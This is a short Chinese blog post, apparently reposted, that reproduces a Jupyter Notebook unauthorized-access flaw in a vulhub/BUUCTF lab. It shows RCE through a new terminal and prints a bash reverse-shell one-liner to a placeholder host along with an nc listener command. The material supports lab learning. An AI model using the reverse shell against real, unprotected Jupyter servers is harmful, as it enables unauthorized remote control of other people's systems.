Jupyter Notebook 未授权访问漏洞简单复现 - 走看看

zoukankan html css js c++ java

Jupyter Notebook 未授权访问漏洞简单复现
1.简介

Jupyter Notebook（此前被称为 IPython notebook）是一个交互式笔记本，支持运行 40 多种编程语言。
如果管理员未为Jupyter Notebook配置密码，将导致未授权访问漏洞，游客可在其中创建一个console并执行任意Python代码和命令。

2.复现环境

来源于https://github.com/vulhub/vulhub/blob/master/jupyter/notebook-rce/
图方便直接用BUUCTF的REAL环境复现

3.利用

新建一个terminal窗口，嘿嘿嘿，直接就RCE了

如下图

4.感觉也没啥好说的

关于反弹shell
```
bash -i >& /dev/tcp/x.x.x.x/8080 0>&1
```
然后另一边监听就好了
```
nc -lvp 8080（像这样）
```
查看全文

相关阅读:
sql 算法 : Nested Loop，Hash Join，Merge Join介绍
 Win10 上安装Arduino 驱动和 Arduino IDE 1.6.9
Learning Python 012 函数式编程 2 返回函数匿名函数装饰器偏函数
 Learning Python 012 函数式编程 1 高阶函数
 Learning Python 011 高级特性 2
Learning Python 011 高级特性 1
Learning Python 010 函数 2
Learning Python 010 函数 1
Learning Python 009 dict（字典）和 set
Could not get lock /var/lib/dpkg/lock

原文地址：https://www.cnblogs.com/mke2fs/p/12718499.html

Copyright © 2011-2022 走看看